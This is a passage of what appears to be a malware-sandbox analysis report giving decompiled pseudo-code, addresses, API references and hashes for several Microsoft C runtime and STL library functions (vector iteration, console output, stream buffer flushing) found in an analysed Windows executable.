				 *((intOrPtr*)(__ecx + 4)) = 0;
				_t13 =  *((intOrPtr*)(_t31 + 0xc));
				_t19 =  *((intOrPtr*)(_t31 + 8));
				 *((intOrPtr*)(_t31 - 4)) = 0;
				if(_t13 != 0 && ( *((intOrPtr*)(_t13 + 8)) > _t19 || _t19 >  *((intOrPtr*)(_t13 + 0xc)))) {
					_t26 = L"C:\\Program Files (x86)\\Microsoft Visual Studio 9.0\\VC\\include\\vector";
					if(L0040C820(2, L"C:\\Program Files (x86)\\Microsoft Visual Studio 9.0\\VC\\include\\vector", 0x46, 0, L"(\"_Pvector == NULL || (((_Myvec *)_Pvector)->_Myfirst <= _Ptr && _Ptr <= ((_Myvec *)_Pvector)->_Mylast)\", 0)", _t25) == 1) {
						asm("int3");
					}
					E0040C660(_t19, 0, _t26, _t29, L"\"invalid argument\"", L"std::_Vector_const_iterator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::_Vector_const_iterator", _t26, 0x46, 0);
					_t13 =  *((intOrPtr*)(_t31 + 0xc));
				}
				_push(_t13);
				E0040A9F8(_t29);
				 *((intOrPtr*)(_t29 + 8)) = _t19;
				 *[fs:0x0] =  *((intOrPtr*)(_t31 - 0xc));
				return _t29;
			}

0x0040adb5
0x0040adba
0x0040adbf
0x0040adc2
0x0040adc6
0x0040adc9
0x0040adcb
0x0040adce
0x0040add1
0x0040add4
0x0040add9
0x0040adee
0x0040ae01
0x0040ae03
0x0040ae03
0x0040ae13
0x0040ae18
0x0040ae1e
0x0040ae1f
0x0040ae22
0x0040ae2a
0x0040ae31
0x0040ae39

APIs

__EH_prolog.LIBCMT ref: 0040ADBA
__invalid_parameter.LIBCMTD ref: 0040AE13

Strings

"invalid argument", xrefs: 0040AE0E
std::_Vector_const_iterator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::all, xrefs: 0040AE09
("_Pvector == NULL || (((_Myvec *)_Pvector)->_Myfirst <= _Ptr && _Ptr <= ((_Myvec *)_Pvector)->_Mylast)", 0), xrefs: 0040ADE6
C:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\include\vector, xrefs: 0040ADEE, 0040ADF3, 0040AE08

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: H_prolog__invalid_parameter
String ID: "invalid argument"$("_Pvector == NULL || (((_Myvec *)_Pvector)->_Myfirst <= _Ptr && _Ptr <= ((_Myvec *)_Pvector)->_Mylast)", 0)$C:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\include\vector$std::_Vector_const_iterator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::all
API String ID: 2269770249-4062097250
Opcode ID: 2ac5000f797f651b99386ee26e89c4f867e73b591fca22616d8b8e9bcaccce29
Instruction ID: 1c20c7d3f2d9a6201ddfd9d486ecf0f0c2c26442867f9d3dfa60a924f896bad4
Opcode Fuzzy Hash: 2ac5000f797f651b99386ee26e89c4f867e73b591fca22616d8b8e9bcaccce29
Instruction Fuzzy Hash: 4001DEB1B40210ABC724AF09C886F4FB3A4EB44B15F10803FB508B73C1D2B8985086AE

Uniqueness

Uniqueness Score: -1.00%

Function 00420A60 Relevance: 9.1, APIs: 6, Instructions: 76
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E00420A60(void* __edx, void _a4) {
				long _v8;
				int _v12;
				signed int _v16;
				void _v24;
				signed int _t12;
				intOrPtr _t14;
				intOrPtr _t25;
				void* _t31;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t31 = __edx;
				_t12 =  *0x4bb4ec; // 0x2588ab5e
				_v16 = _t12 ^ _t35;
				if( *0x4bbf54 == 0) {
					L12:
					if( *0x4bbf54 != 0) {
						L16:
						_t14 = _a4;
					} else {
						_v12 = WideCharToMultiByte(GetConsoleOutputCP(), 0,  &_a4, 1,  &_v24, 5, 0, 0);
						if( *0x4bc088 == 0xffffffff) {
							L15:
							_t14 = 0xffff;
						} else {
							_t31 =  *0x4bc088; // 0xfffffffe
							if(WriteConsoleA(_t31,  &_v24, _v12,  &_v8, 0) != 0) {
								goto L16;
							} else {
								goto L15;
							}
						}
					}
				} else {
					if( *0x4bc088 == 0xfffffffe) {
						E00424B10();
					}
					if( *0x4bc088 != 0xffffffff) {
						_t31 =  *0x4bc088; // 0xfffffffe
						if(WriteConsoleW(_t31,  &_a4, 1,  &_v8, 0) != 0) {
							 *0x4bbf54 = 1;
							goto L12;
						} else {
							if( *0x4bbf54 != 2 || GetLastError() != 0x78) {
								_t14 = 0xffff;
							} else {
								 *0x4bbf54 = 0;
								goto L12;
							}
						}
					} else {
						_t14 = 0xffff;
					}
				}
				return E00410900(_t14, _t25, _v16 ^ _t35, _t31, _t33, _t34);
			}

0x00420a60
0x00420a68
0x00420a6f
0x00420a79
0x00420aee
0x00420af5
0x00420b48
0x00420b48
0x00420af7
0x00420b16
0x00420b20
0x00420b41
0x00420b41
0x00420b22
0x00420b30
0x00420b3f
0x00000000
0x00000000
0x00000000
0x00000000
0x00420b3f
0x00420b20
0x00420a7b
0x00420a82
0x00420a84
0x00420a84
0x00420a90
0x00420aaa
0x00420ab9
0x00420ae4
0x00000000
0x00420abb
0x00420ac2
0x00420adb
0x00420acf
0x00420acf
0x00000000
0x00420ae2
0x00420ac2
0x00420a92
0x00420a92
0x00420a92
0x00420a90
0x00420b59

APIs

___initconout.LIBCMTD ref: 00420A84

Part of subcall function 00424B10: CreateFileA.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,?,00420A89), ref: 00424B29

GetConsoleOutputCP.KERNEL32(00000000,?,00000001,00000000,00000005,00000000,00000000), ref: 00420B09
WideCharToMultiByte.KERNEL32(00000000), ref: 00420B10
WriteConsoleA.KERNEL32(FFFFFFFE,00000000,?,?,00000000), ref: 00420B37

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: Console$ByteCharCreateFileMultiOutputWideWrite___initconout
String ID:
API String ID: 3432720595-0
Opcode ID: f5e4294038d8a92cf9e478dcfb31c896d26f277214b56200957d54225bdad976
Instruction ID: 29c9c11689e348c4b5685b5104aa382bd1335e1f27d52d79e58f456ea7ffba5e
Opcode Fuzzy Hash: f5e4294038d8a92cf9e478dcfb31c896d26f277214b56200957d54225bdad976
Instruction Fuzzy Hash: 9E21B630600214EBDB20DBA0ED85BBA77A4E718715F90833AF209D61D1D7B85588CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040B7FD Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 192
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E0040B7FD(intOrPtr __ecx) {
				void* __edi;
				void* __esi;
				unsigned int _t74;
				void* _t75;
				signed int _t78;
				signed int _t79;
				signed int _t96;
				signed int _t100;
				signed int _t102;
				intOrPtr _t105;
				unsigned int _t107;
				signed int _t111;
				signed int _t112;
				intOrPtr _t119;
				void* _t122;
				unsigned int _t137;
				void* _t148;
				signed int _t153;
				signed int _t155;
				signed int _t157;
				intOrPtr _t161;
				void* _t165;
				void* _t167;
				intOrPtr _t168;

				E0040D238(E004259BB, _t165);
				_t168 = _t167 - 0x2c;
				_t161 = __ecx;
				 *((intOrPtr*)(_t165 - 0x10)) = _t168;
				 *((intOrPtr*)(_t165 - 0x18)) = __ecx;
				 *(_t165 - 4) =  *(_t165 - 4) & 0x00000000;
				if( *((intOrPtr*)(_t165 + 8)) != __ecx) {
					L3:
					E0040BB90(L"vector insert iterator outside range", L"C:\\Program Files (x86)\\Microsoft Visual Studio 9.0\\VC\\include\\vector", 0x48b);
					_t168 = _t168 + 0xc;
					L4:
					_t74 = E0040A708(_t161);
					_t153 =  *(_t165 + 0x14);
					_t107 = _t74;
					if(_t153 != 0) {
						_t119 =  *((intOrPtr*)(_t161 + 0xc));
						_t78 = _t119 -  *(_t161 + 8) >> 5;
						_t148 = 0x7ffffff - _t78;
						_t176 = 0x7ffffff - _t153;
						if(0x7ffffff < _t153) {
							_t78 = E0040B2F1(_t148, _t176);
						}
						_t79 = _t78 + _t153;
						if(_t107 >= _t79) {
							_push( *((intOrPtr*)(_t165 + 0x18)));
							__eflags = _t119 -  *((intOrPtr*)(_t165 + 0x10)) >> 5 - _t153;
							_t122 = _t165 - 0x38;
							if(_t119 -  *((intOrPtr*)(_t165 + 0x10)) >> 5 >= _t153) {
								E0040AFE7(_t122, _t148);
								_t109 =  *((intOrPtr*)(_t161 + 0xc));
								_t155 = _t153 << 5;
								 *((intOrPtr*)(_t165 + 0x18)) =  *((intOrPtr*)(_t161 + 0xc));
								 *((intOrPtr*)(_t165 + 0x18)) =  *((intOrPtr*)(_t165 + 0x18)) - _t155;
								 *(_t165 - 4) = 6;
								 *((intOrPtr*)(_t161 + 0xc)) = E0040B7BC(_t161,  *((intOrPtr*)(_t165 + 0x18)),  *((intOrPtr*)(_t161 + 0xc)),  *((intOrPtr*)(_t161 + 0xc)));
								E0040A71B(_t161, _t161,  *((intOrPtr*)(_t165 + 0x10)), _t81);
								E0040B7D5(_t161,  *((intOrPtr*)(_t165 + 0x10)),  *((intOrPtr*)(_t165 + 0x18)), _t109);
								_t156 = _t155 +  *((intOrPtr*)(_t165 + 0x10));
								__eflags = _t155 +  *((intOrPtr*)(_t165 + 0x10));
								E0040B3C4(_t148,  *((intOrPtr*)(_t165 + 0x10)), _t155 +  *((intOrPtr*)(_t165 + 0x10)), _t165 - 0x38);
							} else {
								E0040AFE7(_t122, _t148);
								_t111 = _t153 << 5;
								 *(_t165 - 4) = 3;
								E0040B7BC(_t161,  *((intOrPtr*)(_t165 + 0x10)),  *((intOrPtr*)(_t161 + 0xc)), _t111 +  *((intOrPtr*)(_t165 + 0x10)));
								 *(_t165 - 4) = 4;
								_t156 = _t153 - ( *((intOrPtr*)(_t161 + 0xc)) -  *((intOrPtr*)(_t165 + 0x10)) >> 5);
								E0040B79A(_t161, __eflags,  *((intOrPtr*)(_t161 + 0xc)), _t153 - ( *((intOrPtr*)(_t161 + 0xc)) -  *((intOrPtr*)(_t165 + 0x10)) >> 5), _t165 - 0x38);
								 *((intOrPtr*)(_t161 + 0xc)) =  *((intOrPtr*)(_t161 + 0xc)) + _t111;
								 *(_t165 - 4) = 3;
								E0040A71B(_t161, _t161,  *((intOrPtr*)(_t165 + 0x10)),  *((intOrPtr*)(_t161 + 0xc)));
								E0040B3C4(_t148,  *((intOrPtr*)(_t165 + 0x10)),  *((intOrPtr*)(_t161 + 0xc)) - _t111, _t165 - 0x38);
							}
							 *(_t165 - 4) = 0;
							E0040AB3E(_t165 - 0x38, _t156, 1, 0);
							E00408EBE(_t165 - 0x38);
						} else {
							_t137 = _t107 >> 1;
							if(0x7ffffff - _t137 >= _t107) {
								_t112 = _t107 + _t137;
								__eflags = _t112;
							} else {
								_t112 = 0;
							}
							_t179 = _t112 - _t79;
							if(_t112 < _t79) {
								_t112 = _t79;
							}
							_push(0);
							_t96 = E0040A8C1(_t112);
							 *(_t165 - 0x14) = _t96;
							 *(_t165 + 0x14) = _t96;
							 *(_t165 - 4) = 1;
							 *(_t165 + 0x14) = E0040B7BC(_t161,  *(_t161 + 8),  *((intOrPtr*)(_t165 + 0x10)), _t96);
							 *(_t165 + 0x14) = E0040B79A(_t161, _t179, _t97, _t153,  *((intOrPtr*)(_t165 + 0x18)));
							E0040B7BC(_t161,  *((intOrPtr*)(_t165 + 0x10)),  *((intOrPtr*)(_t161 + 0xc)), _t98);
							_t100 =  *(_t161 + 8);
							 *(_t165 - 4) =  *(_t165 - 4) & 0x00000000;
							_t157 = _t153 + ( *((intOrPtr*)(_t161 + 0xc)) - _t100 >> 5);
							if(_t100 != 0) {
								E0040B446(_t100,  *((intOrPtr*)(_t161 + 0xc)), _t161 + 4);
								E0040C1E0( *(_t161 + 8));
							}
							E00408EBE(_t161);
							_t102 =  *(_t165 - 0x14);
							 *((intOrPtr*)(_t161 + 0x10)) = (_t112 << 5) + _t102;
							 *((intOrPtr*)(_t161 + 0xc)) = (_t157 << 5) + _t102;
							 *(_t161 + 8) = _t102;
						}
					}
					 *(_t165 - 4) =  *(_t165 - 4) | 0xffffffff;
					_t75 = E0040A9BC(_t165 + 8);
					 *[fs:0x0] =  *((intOrPtr*)(_t165 - 0xc));
					return _t75;
				}
				_t105 =  *((intOrPtr*)(_t165 + 0x10));
				if(_t105 <  *((intOrPtr*)(__ecx + 8)) ||  *((intOrPtr*)(__ecx + 0xc)) < _t105) {
					goto L3;
				} else {
					goto L4;
				}
			}

0x0040b802
0x0040b807
0x0040b80d
0x0040b80f
0x0040b812
0x0040b815
0x0040b81c
0x0040b82b
0x0040b83a
0x0040b83f
0x0040b842
0x0040b844
0x0040b849
0x0040b84c
0x0040b850
0x0040b856
0x0040b863
0x0040b866
0x0040b868
0x0040b86a
0x0040b86c
0x0040b86c
0x0040b871
0x0040b875
0x0040b94b
0x0040b951
0x0040b953
0x0040b956
0x0040b9eb
0x0040b9f0
0x0040b9f4
0x0040b9f7
0x0040b9fa
0x0040ba03
0x0040ba12
0x0040ba15
0x0040ba21
0x0040ba2d
0x0040ba2d
0x0040ba31
0x0040b95c
0x0040b95c
0x0040b966
0x0040b973
0x0040b977
0x0040b988
0x0040b98f
0x0040b995
0x0040b99a
0x0040b9a5
0x0040b9ac
0x0040b9be
0x0040b9c3
0x0040ba40
0x0040ba44
0x0040ba4c
0x0040b87b
0x0040b87d
0x0040b888
0x0040b88e
0x0040b88e
0x0040b88a
0x0040b88a
0x0040b88a
0x0040b890
0x0040b892
0x0040b894
0x0040b894
0x0040b896
0x0040b899
0x0040b8a7
0x0040b8aa
0x0040b8ad
0x0040b8bd
0x0040b8ce
0x0040b8d1
0x0040b8d6
0x0040b8dc
0x0040b8e5
0x0040b8e9
0x0040b8f4
0x0040b8fc
0x0040b901
0x0040b904
0x0040b909
0x0040b916
0x0040b919
0x0040b91c
0x0040b91c
0x0040b875
0x0040ba51
0x0040ba58
0x0040ba62
0x0040ba6b
0x0040ba6b
0x0040b81e
0x0040b824
0x00000000
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog.LIBCMT ref: 0040B802
std::_Debug_message.LIBCPMTD ref: 0040B83A
delete.LIBCMTD ref: 0040B8FC

Strings

vector insert iterator outside range, xrefs: 0040B835
C:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\include\vector, xrefs: 0040B830

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: Debug_messageH_prologdeletestd::_
String ID: C:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\include\vector$vector insert iterator outside range
API String ID: 1806319364-4179120761
Opcode ID: 2f0206b83406d869cc7b71450b9db2c92c76b9106c7ac9f0118abf82f3c475fa
Instruction ID: 5b935de9c85e8d3abc7c5618e5ea2360193d43cd0192c543e3a37ba42a099094
Opcode Fuzzy Hash: 2f0206b83406d869cc7b71450b9db2c92c76b9106c7ac9f0118abf82f3c475fa
Instruction Fuzzy Hash: 556192B1A00305AFCF15EF65C885AAF7BB5EF94354F10852EF816A36C1DB34A910CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00425463 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00425463() {
				signed int _t104;
				void* _t119;
				void* _t122;
				void* _t130;
				signed int _t179;
				void* _t193;
				void* _t194;
				void* _t195;
				void* _t197;

				if(( *( *((intOrPtr*)(_t195 - 8)) + 0xc) & 0x00000001) == 0) {
					L5:
					 *( *((intOrPtr*)(_t195 - 8)) + 0xc) =  *( *((intOrPtr*)(_t195 - 8)) + 0xc) | 0x00000002;
					 *( *((intOrPtr*)(_t195 - 8)) + 0xc) =  *( *((intOrPtr*)(_t195 - 8)) + 0xc) & 0xffffffef;
					 *( *((intOrPtr*)(_t195 - 8)) + 4) = 0;
					 *(_t195 - 4) = 0;
					_t136 =  *(_t195 - 4);
					 *(_t195 - 0xc) =  *(_t195 - 4);
					if(( *( *((intOrPtr*)(_t195 - 8)) + 0xc) & 0x0000010c) != 0) {
						L10:
						if(( *( *((intOrPtr*)(_t195 - 8)) + 0xc) & 0x00000108) == 0) {
							 *(_t195 - 4) = 2;
							 *((short*)(_t195 - 0x14)) =  *(_t195 + 8) & 0x0000ffff;
							 *(_t195 - 0xc) = E00417D30( *(_t195 - 0x10),  *(_t195 - 0x10), _t195 - 0x14,  *(_t195 - 4));
							L25:
							if( *(_t195 - 0xc) ==  *(_t195 - 4)) {
								_t104 =  *(_t195 + 8) & 0x0000ffff;
							} else {
								 *( *((intOrPtr*)(_t195 - 8)) + 0xc) =  *( *((intOrPtr*)(_t195 - 8)) + 0xc) | 0x00000020;
								_t104 = 0xffff;
							}
							goto L28;
						}
						if( *((intOrPtr*)( *((intOrPtr*)(_t195 - 8)))) -  *((intOrPtr*)( *((intOrPtr*)(_t195 - 8)) + 8)) < 0) {
							_push(L"(\"inconsistent IOB fields\", stream->_ptr - stream->_base >= 0)");
							_push(0);
							_push(0xa0);
							_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\_flsbuf.c");
							_push(2);
							_t119 = L0040C820();
							_t197 = _t197 + 0x14;
							if(_t119 == 1) {
								asm("int3");
							}
						}
						 *(_t195 - 4) =  *((intOrPtr*)( *((intOrPtr*)(_t195 - 8)))) -  *((intOrPtr*)( *((intOrPtr*)(_t195 - 8)) + 8));
						 *((intOrPtr*)( *((intOrPtr*)(_t195 - 8)))) =  *((intOrPtr*)( *((intOrPtr*)(_t195 - 8)) + 8)) + 2;
						 *( *((intOrPtr*)(_t195 - 8)) + 4) =  *((intOrPtr*)( *((intOrPtr*)(_t195 - 8)) + 0x18)) - 2;
						if( *(_t195 - 4) <= 0) {
							if( *(_t195 - 0x10) == 0xffffffff ||  *(_t195 - 0x10) == 0xfffffffe) {
								 *((intOrPtr*)(_t195 - 0x18)) = 0x4bbe00;
							} else {
								 *((intOrPtr*)(_t195 - 0x18)) = (( *(_t195 - 0x10) & 0x0000001f) << 6) +  *((intOrPtr*)(0x4e40e0 + ( *(_t195 - 0x10) >> 5) * 4));
							}
							_t68 =  *((intOrPtr*)(_t195 - 0x18)) + 4; // 0xa80
							_t152 =  *_t68 & 0x00000020;
							if(( *_t68 & 0x00000020) == 0) {
								goto L23;
							} else {
								_t179 =  *(_t195 - 0x10);
								 *(_t195 - 0x20) = E00420E10(_t152, _t179, _t179, 0, 0, 2);
								 *(_t195 - 0x1c) = _t179;
								if(( *(_t195 - 0x20) &  *(_t195 - 0x1c)) != 0xffffffff) {
									goto L23;
								}
								 *( *((intOrPtr*)(_t195 - 8)) + 0xc) =  *( *((intOrPtr*)(_t195 - 8)) + 0xc) | 0x00000020;
								_t104 = 0xffff;
								goto L28;
							}
						} else {
							 *(_t195 - 0xc) = E00417D30( *((intOrPtr*)(_t195 - 8)),  *(_t195 - 0x10),  *((intOrPtr*)( *((intOrPtr*)(_t195 - 8)) + 8)),  *(_t195 - 4));
							L23:
							 *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t195 - 8)) + 8)))) =  *(_t195 + 8) & 0x0000ffff;
							goto L25;
						}
					}
					if( *((intOrPtr*)(_t195 - 8)) == E0040DDA0() + 0x20 ||  *((intOrPtr*)(_t195 - 8)) == E0040DDA0() + 0x40) {
						_t136 =  *(_t195 - 0x10);
						_t122 = E004203E0(_t130,  *(_t195 - 0x10), _t193, _t194,  *(_t195 - 0x10));
						_t197 = _t197 + 4;
						if(_t122 != 0) {
							goto L10;
						}
						goto L9;
					} else {
						L9:
						E00424060(_t136,  *((intOrPtr*)(_t195 - 8)));
						_t197 = _t197 + 4;
						goto L10;
					}
				} else {
					 *( *((intOrPtr*)(_t195 - 8)) + 4) = 0;
					if(( *( *((intOrPtr*)(_t195 - 8)) + 0xc) & 0x00000010) == 0) {
						 *( *((intOrPtr*)(_t195 - 8)) + 0xc) =  *( *((intOrPtr*)(_t195 - 8)) + 0xc) | 0x00000020;
						_t104 = 0xffff;
						L28:
						return _t104;
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t195 - 8)))) =  *((intOrPtr*)( *((intOrPtr*)(_t195 - 8)) + 8));
					 *( *((intOrPtr*)(_t195 - 8)) + 0xc) =  *( *((intOrPtr*)(_t195 - 8)) + 0xc) & 0xfffffffe;
					goto L5;
				}
			}

0x0042549d
0x004254e9
0x004254f5
0x00425504
0x0042550a
0x00425511
0x00425518
0x0042551b
0x00425529
0x00425561
0x0042556d
0x00425675
0x00425685
0x0042569d
0x004256a0
0x004256a6
0x004256c1
0x004256a8
0x004256b4
0x004256b7
0x004256b7
0x00000000
0x004256a6
0x0042557e
0x00425580
0x00425585
0x00425587
0x0042558c
0x00425591
0x00425593
0x00425598
0x0042559e
0x004255a0
0x004255a0
0x0042559e
0x004255ac
0x004255bb
0x004255c9
0x004255d0
0x004255f2
0x00425615
0x004255fa
0x00425610
0x00425610
0x0042561f
0x00425623
0x00425626
0x00000000
0x00425628
0x0042562e
0x0042563a
0x0042563d
0x00425649
0x00000000
0x00000000
0x00425657
0x0042565a
0x00000000
0x0042565a
0x004255d2
0x004255e9
0x00425661
0x00425670
0x00000000
0x00425670
0x004255d0
0x00425536
0x00425545
0x00425549
0x0042554e
0x00425553
0x00000000
0x00000000
0x00000000
0x00425555
0x00425555
0x00425559
0x0042555e
0x00000000
0x0042555e
0x0042549f
0x004254a2
0x004254b2
0x004254dc
0x004254df
0x004256c6
0x004256c9
0x004256c9
0x004254bd
0x004254cb
0x00000000
0x004254cb

APIs

__isatty.LIBCMTD ref: 00425549
__getbuf.LIBCMTD ref: 00425559
__write.LIBCMTD ref: 004255E1

Strings

f:\dd\vctools\crt_bld\self_x86\crt\src\_flsbuf.c, xrefs: 0042558C
("inconsistent IOB fields", stream->_ptr - stream->_base >= 0), xrefs: 00425580

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: __getbuf__isatty__write
String ID: ("inconsistent IOB fields", stream->_ptr - stream->_base >= 0)$f:\dd\vctools\crt_bld\self_x86\crt\src\_flsbuf.c
API String ID: 2861569966-4070537404
Opcode ID: 5a1b902f8dd270ff4f84f5bb8454cda39c634ff6c4a8394c5f5f34266e50324e
Instruction ID: 3e2ceed426bf46f7e5c65602e47314d4d3ebd4550aea21631883b66230a2d6ee
Opcode Fuzzy Hash: 5a1b902f8dd270ff4f84f5bb8454cda39c634ff6c4a8394c5f5f34266e50324e
Instruction Fuzzy Hash: B451F874A00608EFDB14CF98D491A6DFBB2FF88324F54C299D449AB395D634EA81CB44

Uniqueness

Uniqueness Score: -1.00%

Function 0041F021 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E0041F021() {
				signed int _t102;
				signed int _t104;
				signed int _t114;
				void* _t118;
				void* _t121;
				signed int _t126;
				void* _t129;
				signed int _t174;
				void* _t188;
				void* _t189;
				void* _t190;
				void* _t192;

				if(( *( *(_t190 - 8) + 0xc) & 0x00000001) == 0) {
					L5:
					 *( *(_t190 - 8) + 0xc) =  *( *(_t190 - 8) + 0xc) | 0x00000002;
					 *( *(_t190 - 8) + 0xc) =  *( *(_t190 - 8) + 0xc) & 0xffffffef;
					 *( *(_t190 - 8) + 4) = 0;
					 *(_t190 - 4) = 0;
					_t135 =  *(_t190 - 4);
					 *(_t190 - 0xc) =  *(_t190 - 4);
					if(( *( *(_t190 - 8) + 0xc) & 0x0000010c) != 0) {
						L10:
						if(( *( *(_t190 - 8) + 0xc) & 0x00000108) == 0) {
							 *(_t190 - 4) = 1;
							 *(_t190 - 0xc) = E00417D30( *(_t190 - 4),  *(_t190 - 0x10), _t190 + 8,  *(_t190 - 4));
							L25:
							if( *(_t190 - 0xc) ==  *(_t190 - 4)) {
								_t102 =  *(_t190 + 8) & 0x000000ff;
							} else {
								_t104 =  *( *(_t190 - 8) + 0xc) | 0x00000020;
								 *( *(_t190 - 8) + 0xc) = _t104;
								_t102 = _t104 | 0xffffffff;
							}
							goto L28;
						}
						if( *( *(_t190 - 8)) -  *((intOrPtr*)( *(_t190 - 8) + 8)) < 0) {
							_push(L"(\"inconsistent IOB fields\", stream->_ptr - stream->_base >= 0)");
							_push(0);
							_push(0xa0);
							_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\_flsbuf.c");
							_push(2);
							_t118 = L0040C820();
							_t192 = _t192 + 0x14;
							if(_t118 == 1) {
								asm("int3");
							}
						}
						 *(_t190 - 4) =  *( *(_t190 - 8)) -  *((intOrPtr*)( *(_t190 - 8) + 8));
						 *( *(_t190 - 8)) =  *((intOrPtr*)( *(_t190 - 8) + 8)) + 1;
						 *( *(_t190 - 8) + 4) =  *((intOrPtr*)( *(_t190 - 8) + 0x18)) - 1;
						if( *(_t190 - 4) <= 0) {
							if( *(_t190 - 0x10) == 0xffffffff ||  *(_t190 - 0x10) == 0xfffffffe) {
								 *((intOrPtr*)(_t190 - 0x14)) = 0x4bbe00;
							} else {
								 *((intOrPtr*)(_t190 - 0x14)) = (( *(_t190 - 0x10) & 0x0000001f) << 6) +  *((intOrPtr*)(0x4e40e0 + ( *(_t190 - 0x10) >> 5) * 4));
							}
							_t68 =  *((intOrPtr*)(_t190 - 0x14)) + 4; // 0xa80
							_t149 =  *_t68 & 0x00000020;
							if(( *_t68 & 0x00000020) == 0) {
								goto L23;
							} else {
								_t174 =  *(_t190 - 0x10);
								 *(_t190 - 0x1c) = E00420E10(_t149, _t174, _t174, 0, 0, 2);
								 *(_t190 - 0x18) = _t174;
								if(( *(_t190 - 0x1c) &  *(_t190 - 0x18)) != 0xffffffff) {
									goto L23;
								}
								_t114 =  *(_t190 - 8);
								 *(_t114 + 0xc) =  *( *(_t190 - 8) + 0xc) | 0x00000020;
								_t102 = _t114 | 0xffffffff;
								goto L28;
							}
						} else {
							 *(_t190 - 0xc) = E00417D30( *(_t190 - 8),  *(_t190 - 0x10),  *((intOrPtr*)( *(_t190 - 8) + 8)),  *(_t190 - 4));
							L23:
							 *((char*)( *((intOrPtr*)( *(_t190 - 8) + 8)))) =  *(_t190 + 8);
							goto L25;
						}
					}
					if( *(_t190 - 8) == E0040DDA0() + 0x20 ||  *(_t190 - 8) == E0040DDA0() + 0x40) {
						_t135 =  *(_t190 - 0x10);
						_t121 = E004203E0(_t129,  *(_t190 - 0x10), _t188, _t189,  *(_t190 - 0x10));
						_t192 = _t192 + 4;
						if(_t121 != 0) {
							goto L10;
						}
						goto L9;
					} else {
						L9:
						E00424060(_t135,  *(_t190 - 8));
						_t192 = _t192 + 4;
						goto L10;
					}
				} else {
					 *( *(_t190 - 8) + 4) = 0;
					if(( *( *(_t190 - 8) + 0xc) & 0x00000010) == 0) {
						_t126 =  *(_t190 - 8);
						 *( *(_t190 - 8) + 0xc) =  *(_t126 + 0xc) | 0x00000020;
						_t102 = _t126 | 0xffffffff;
						L28:
						return _t102;
					}
